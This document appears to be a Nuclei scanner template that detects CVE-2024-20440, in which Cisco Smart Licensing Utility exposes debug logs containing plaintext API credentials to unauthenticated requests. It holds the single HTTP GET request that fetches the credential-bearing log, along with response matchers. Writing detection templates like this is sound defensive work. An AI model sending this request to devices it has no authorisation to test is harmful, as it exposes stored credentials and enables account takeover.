id: CVE-2024-20440 info: name: Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials author: iamnoooob,parthmalhotra,pdresearch severity: high description: | A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to access sensitive information.This vulnerability is due to excessive verbosity in a debug log file. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain log files that contain sensitive data, including credentials that can be used to access the API. reference: - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-20440 cwe-id: CWE-532 metadata: verified: true max-request: 1 tags: cve,cve2024,cisco,smart,licensing,info-leak http: - raw: - | GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "csluev.log" - type: word part: content_type words: - "text/x-log" - type: status status: - 200 # digest: 4a0a00473045022100c9266c056e11cf7d2658aff709b7d43f07ebefe4d48034408ef4b234fda0043a022075541c4c0b1ada1794ee1d30c0de132691c315cbc4b50ea085cf6d3dd3b720ed:922c64590222798bb761d5b6d8e72950